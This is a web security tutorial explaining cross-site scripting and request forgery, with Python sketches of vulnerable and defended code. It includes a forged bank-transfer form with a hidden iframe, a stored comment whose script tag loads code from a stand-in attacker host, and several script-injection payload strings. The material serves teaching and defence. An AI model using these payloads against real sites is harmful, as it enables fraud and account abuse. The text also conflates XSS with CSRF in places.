What is Cross-Site Scripting (XSS)? How is it Used to Attack Websites?
In this tutorial, we are going to learn about Cross-Site Scripting (XSS). We'll look at the concept of untrusted data and input sanitisation.

By Tim Trott | Privacy & Security | February 10, 2016

This article is part of the Internet Security 101 series.

So what exactly is untrusted data? It is any data whose integrity cannot be verified and whose intent may be malicious. It may carry payloads such as SQL injection, and cross-site scripting can even be used to distribute binary data containing malware.

This untrusted data can come from many sources, but the main source is the user: a query string in the URL, a submitted form or, as we have seen previously, a manipulated raw HTTP request. We must also consider the possibility that your database contains untrusted data, for example where form submissions have been stored in it.

What is a Cross-Site Scripting Attack?

A Cross-Site Scripting (XSS) Attack is a type of injection whereby malicious scripts are injected into normally safe and trusted websites. These scripts can perform actions such as logging keystrokes, downloading and installing malware, stealing personal information or some other action which may be of detriment to the user.

Cross-Site Scripting attacks are typically carried out against authenticated users and involve the user unknowingly acting on the attacker's behalf.

There isn't much value in getting an unauthenticated user to act, but there is huge value in getting an authenticated user to do so. A classic example is a victim who has authenticated to their online bank and is made to transfer money into the attacker's account. If the victim is authenticated and the attacker can trick the victim's browser into making a request on the attacker's behalf, the transaction can be carried out.

The only thing that identifies a user as authenticated is the authentication cookie, which we have seen before. If it is left unprotected, it becomes an attack vector. As we have seen in previous tutorials, cookies are sent with every request, secure or insecure. If an authentication cookie is transmitted over an insecure connection, its contents can be captured and the session hijacked. Even if the cookie is secure, XSS attacks can still leave an application and its users vulnerable.

So how does an attacker trick a victim into making a malicious request that they never intended to make, and that works to the attacker's advantage?

Cross Site Request Forgery

To understand how much of a problem XSS is, we must understand how a user session is authenticated. Since HTTP is a stateless protocol (each request knows nothing about the previous request), cookies are used to maintain state through a session id. This id links back to a session held on the server, usually in a database, so when the server processes the request it knows who the user is. The authentication cookie is sent automatically to the website with EVERY request, and the website identifies and authorises the user based on that cookie.
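The session lookup described above can be sketched in a few lines of Python. This is only an illustration, not how any particular framework does it: the `SESSIONS` dictionary, the `session_id` cookie name and both function names are assumptions made up for the example.

```python
import secrets

# Hypothetical in-memory session store; a real application would
# typically keep this in a database or cache.
SESSIONS = {}


def log_in(username):
    """Create a session and return the id that goes into the cookie."""
    session_id = secrets.token_urlsafe(32)
    SESSIONS[session_id] = username
    return session_id


def identify_user(cookies):
    """Return the user for this request, or None if not authenticated."""
    session_id = cookies.get("session_id")
    return SESSIONS.get(session_id)


cookie_value = log_in("alice")
# The browser attaches the cookie to every later request automatically.
print(identify_user({"session_id": cookie_value}))  # alice
print(identify_user({}))                            # None
```

Notice that the server only ever sees the cookie. It has no other way of knowing who, or what, caused the request to be sent.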

Let's continue with the example of the online banking application. We have a user who has authenticated successfully to the application, so they have an authentication cookie. Now, every time they make a request to the server, that authentication cookie is sent along to reauthenticate the session. It's not the user doing this, though. You are never aware of sending the cookie; it is the browser which does this for you. This is an important distinction because it is the browser that we will be tricking.

What the attacker is aiming to do is to send a malicious request to the server using the user's browser. When that request is issued, the cookie will, of course, be sent along with it. All of this happens against a legitimate website, with a legitimately constructed request. It's just that the request is one the user didn't intend.

How are Cross Site Scripting Attacks Performed?

In the most basic Cross Site Scripting attack, a script (usually a JavaScript include tag pointing to a script on a remote server) is submitted in a form field. It could be a username on a registration page, a comment on a blog post or any other piece of submitted data which is then displayed to other users. If the input is not properly sanitised, the script tag will be rendered to every user visiting that page.

Lady Gaga Hacked

In 2012, the Twitter account of Lady Gaga was hacked, and a malicious link was added to the Twitter feed. Many attacks come from reputable sources such as Twitter and Facebook, sites where attackers can share links. The attacks are based on the user following a link to the attacker's website, which mounts the attack.

So here is a nice little enticement. A free Macbook! It looks legit, and the source is Lady Gaga, so it can't possibly be bad! Right? So the user goes ahead and clicks the link. They are then sent to the attacker's website, which will probably be styled to look like an authentic page and use a similar domain name, but one which the attacker controls, for example mapple.com. Very similar, but different.

The attacker's page will then get the user to act, typically by filling in a form and clicking a button.

Common Attack Vectors

Another attack vector is the use of search queries. A typical behaviour for a website search box is to redirect to a search engine-friendly search page which contains the search term in the URL. So, for example, if you search for "camera" you may well get redirected to the search page "/search/camera/". The page may also contain some code which extracts this search term, performs the search and shows some text saying something like "Here are your results for 'camera'". If this URL parameter is not properly sanitised, a malicious script can be injected and rendered to the page. The attacker then simply runs the crafted URL through a URL shortener and distributes it on social media. Any user who clicks a link to your site with the malicious search parameter in the URL will be compromised.
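To make the search example concrete, here is a minimal Python sketch of such a page. The function names and the crafted URL are invented for illustration. It assumes the term is the path segment after `/search/`, and the safe variant uses `html.escape` from the Python standard library.

```python
from html import escape
from urllib.parse import unquote


def search_term_from_path(path):
    """Extract and URL-decode the term from a path like /search/camera/."""
    return unquote(path.strip("/").split("/", 1)[1])


def render_unsafe(term):
    # Vulnerable: the term is placed into the page exactly as received.
    return "<p>Here are your results for '" + term + "'</p>"


def render_safe(term):
    # The term is HTML-encoded first, so markup in it is shown as text.
    return "<p>Here are your results for '" + escape(term) + "'</p>"


# A crafted link: the "search term" is really a URL-encoded script tag.
crafted = "/search/%3Cscript%3Ealert(1)%3C%2Fscript%3E/"
term = search_term_from_path(crafted)
print(render_unsafe(term))
print(render_safe(term))
```

The first line printed contains a live script tag that a browser would execute. The second contains the same characters encoded as harmless text.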

Persistent XSS attacks

Persistent XSS is an attack which is not delivered through the URL but is instead injected into your database. This type of attack is commonly used in blog comments by spammers and malicious hackers. Each time a visitor accesses the compromised page, the malicious script is downloaded and executed in their browser. This type of attack doesn't rely on a user clicking on any links to get to a page, nor does it rely on crafted query strings. The attack is already in your database, having slipped through earlier because input sanitisation was missing or incomplete.
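The following Python sketch illustrates why a stored payload reaches every visitor. The `COMMENTS` list is a hypothetical stand-in for a comments table, and the function names and the `attacker.example` URL are assumptions made up for the example.

```python
# Hypothetical in-memory stand-in for a comments table.
COMMENTS = []


def save_comment(author, text):
    # Vulnerable: the text is stored exactly as submitted.
    COMMENTS.append({"author": author, "text": text})


def render_comments():
    # Vulnerable: stored text is written into the page without encoding.
    return "\n".join(
        "<li>" + c["author"] + ": " + c["text"] + "</li>" for c in COMMENTS
    )


save_comment("mallory", '<script src="https://attacker.example/x.js"></script>')
save_comment("alice", "Great article!")

# Every visitor gets the same page, so every visitor receives the script.
for visitor in ("bob", "carol"):
    page = render_comments()
    print(visitor, "receives script:", "<script" in page)
```

The payload was submitted once, yet it is served again on every page view until it is removed from the store or encoded when rendered.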

How Cross Site Request Forgery Attacks Work

Now, on the attacker's page, the user will be presented with a form and a button to click. When the button is clicked there is a postback to the server and the contents of the form are sent in that POST request. On the attacker's page, however, the form posts to the online bank's funds transfer address, and the form controls are constructed to send exactly the form data that the banking page expects. The browser will automatically attach the authentication cookie. As far as the banking server is concerned, it has just received a request to transfer funds from the victim's browser, with a valid authentication cookie, so it goes ahead and processes the transaction.

So what does the form structure look like?

<form action="http://www.myonlinebank.com/transfer" method="POST" target="hiddenFrame">
  <input type="hidden" name="targetAccount" value="6365584" />
  <input type="hidden" name="amountToTransfer" value="99.99" />
  <input type="submit" value="Win an iPad" onclick="alert('You Won!!!')" />
</form>

<iframe name="hiddenFrame" style="display:none;visibility:hidden"></iframe>

This form, hosted on the attacker's website, posts all of its values to the online bank's transfer address. It passes two parameters: the attacker's account number and the amount to transfer. When the button is clicked, the request is sent to the online banking application together with the authentication cookie, and the funds are transferred. To prevent the user from seeing what is happening, the response is loaded into the hidden frame.
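Seen from the server's side, the forged request looks like any other. The Python sketch below is a deliberately naive handler written only to illustrate this. The `SESSIONS` store, the `session_id` cookie name and `handle_transfer` are assumptions, while the form field names are taken from the form above.

```python
# Hypothetical session store: session id -> account holder.
SESSIONS = {"abc123": "victim"}
TRANSFERS = []


def handle_transfer(cookies, form):
    """Process POST /transfer, trusting the session cookie alone."""
    user = SESSIONS.get(cookies.get("session_id"))
    if user is None:
        return "403 Forbidden"
    # Nothing here shows which page the form was submitted from.
    TRANSFERS.append((user, form["targetAccount"], form["amountToTransfer"]))
    return "200 OK"


# The forged form posts the attacker's values; the browser adds the cookie.
forged_form = {"targetAccount": "6365584", "amountToTransfer": "99.99"}
print(handle_transfer({"session_id": "abc123"}, forged_form))  # 200 OK
print(handle_transfer({}, forged_form))                        # 403 Forbidden
```

The handler rejects a request without a cookie, but it cannot tell a form on the bank's own page from an identical form on the attacker's page.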

This is an overly simplified example, but it serves to show how an attack could be constructed. It relies on the user being pre-authenticated to the banking website, clicking a link from an external source to the attacker's website and then completing the action. So this introduces a new attack vector to the mix, that of tricking the user. This is called social engineering, and we'll look at this in the next tutorial.

How to Prevent Cross Site Scripting

Untrusted data will most likely come from a URL parameter or a post-data parameter.

Anti-forgery tokens

The attack we just saw is so prevalent and so easy because it relies on a very specific, known pattern. The attack merely replicates exactly what the actual application would do. The attacker just controls the values in the POST request.

So how can we mitigate CSRF attacks? The main protection against CSRF attacks is the use of an anti-forgery token. This token is used to ensure that the authentication cookie and the form POST request match up.

The server adds a hidden field containing a token to the legitimate form, and pairs it with another token added to the authentication cookie. The attacking website has no access to this token and therefore no means of replicating it in the form submission. When the form is submitted, the server first checks whether the request contains the anti-forgery token. If it does, the server checks that it matches the contents of the authentication cookie. Only if the two match will the transaction be completed.

Anti-forgery tokens add randomness to the request pattern. The attacker does not have access to the token and therefore cannot submit it in a hidden field. The server verifies the token in the hidden field against the one in the cookie.
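The token check can be sketched roughly as follows in Python. It is a simplified illustration rather than any framework's actual implementation: the `csrf_token` cookie and field name and both function names are assumptions, and real frameworks usually also tie the token to the user's session.

```python
import hmac
import secrets


def issue_token():
    """Create a random token to place in both the cookie and the hidden field."""
    return secrets.token_urlsafe(32)


def is_request_genuine(cookies, form):
    """Accept the request only if the form token matches the cookie token."""
    cookie_token = cookies.get("csrf_token", "")
    form_token = form.get("csrf_token", "")
    if not cookie_token or not form_token:
        return False
    # compare_digest avoids leaking information through timing differences.
    return hmac.compare_digest(cookie_token.encode(), form_token.encode())


token = issue_token()
cookies = {"session_id": "abc123", "csrf_token": token}

legitimate = {"targetAccount": "111", "csrf_token": token}
forged = {"targetAccount": "6365584"}  # the attacker cannot read the token

print(is_request_genuine(cookies, legitimate))  # True
print(is_request_genuine(cookies, forged))      # False
```

The forged form still arrives with the victim's cookies, but because the attacker's page cannot read the token it has nothing valid to put in the hidden field.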

Input Sanitisation

There are several methods for preventing XSS. One of the most common and simplest is input sanitisation. This involves identifying data that could be used maliciously and removing or replacing it.

Examples of potentially dangerous input include the ', ", / and ; characters. These are often used to inject script tags into pages or to launch SQL injection attacks. We'll see more of these when we look at parameter tampering.

Another method is to employ a whitelist or blacklist approach to processing inputs. A whitelist is very explicit: "This is what we know is good, so we're only going to allow these." A blacklist, on the other hand, is very implicit: "This is what could be bad, so everything else must be OK."
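The difference between the two approaches can be illustrated with a short Python sketch. The username rule and the blacklist entries are arbitrary assumptions chosen for the example, not recommended values.

```python
import re

# Assumed rule for this sketch: usernames are 3-20 letters, digits or underscores.
USERNAME_PATTERN = re.compile(r"[A-Za-z0-9_]{3,20}")

# A blacklist names what is forbidden and lets everything else through.
BLACKLISTED = ("<script", "'", '"', ";")


def passes_whitelist(value):
    return USERNAME_PATTERN.fullmatch(value) is not None


def passes_blacklist(value):
    lowered = value.lower()
    return not any(bad in lowered for bad in BLACKLISTED)


candidates = (
    "tim_trott",
    "<script>alert(1)</script>",
    "<img src=x onerror=alert(1)>",
)
for candidate in candidates:
    print(candidate, passes_whitelist(candidate), passes_blacklist(candidate))
```

The last candidate passes the blacklist because nobody thought to list it, while the whitelist rejects it without needing to know anything about it. This is why a whitelist is generally the safer choice wherever the set of valid values can be described.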

Output Encoding

Another essential method, in addition to input sanitisation, is to encode the output as well. This prevents things like script tags from being rendered as markup. Instead, they are shown as harmless text and not executed. For example, the opening script tag would be encoded to &lt;script&gt;.

Most frameworks and platforms have built-in methods for sanitising input and encoding outputs. Please research these functions for your platform or framework.
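As one example of such a built-in function, Python's standard library provides `html.escape`. The sketch below shows what it does to a few sample strings. The `render_input` helper and the field name `q` are made up for illustration.

```python
from html import escape

samples = [
    "<script>alert('xss')</script>",
    'Tom & "Jerry"',
]

for raw in samples:
    # <, >, & and both quote characters are replaced with HTML entities.
    print(escape(raw))


def render_input(value):
    """Place a value inside an HTML attribute, encoding quotes as well."""
    return '<input type="text" name="q" value="' + escape(value, quote=True) + '">'


# Without encoding, the leading quote would close the attribute early.
print(render_input('" onmouseover="alert(1)'))
```

Encoding the quote characters matters as much as encoding the angle brackets when the value ends up inside an attribute, since an unencoded quote would let the input break out of the attribute and add its own.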

Server Headers

The X-XSS-Protection header is another protection mechanism available in some browsers. Because XSS attacks conform to a fairly simple pattern (loading a script from a remote server), browsers can be instructed to detect XSS attacks and block or warn about them. You cannot rely on this, however, as not every browser supports the header. You still need to implement input sanitisation and output encoding. This is just another layer of security.
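Setting the header is usually a one-line configuration change in the web server or framework. As a framework-neutral sketch in Python, assuming response headers are held in a plain dictionary, and with `add_security_headers` being a made-up helper name:

```python
def add_security_headers(headers):
    """Return a copy of the response headers with the XSS filter header set."""
    secured = dict(headers)
    # "1; mode=block" asks the browser's filter to block the page
    # rather than try to clean it up.
    secured["X-XSS-Protection"] = "1; mode=block"
    return secured


response_headers = add_security_headers({"Content-Type": "text/html; charset=utf-8"})
for name, value in response_headers.items():
    print(name + ": " + value)
```

Browsers that do not implement the filter simply ignore the header, which is one more reason to treat it as an extra layer and not as the main defence.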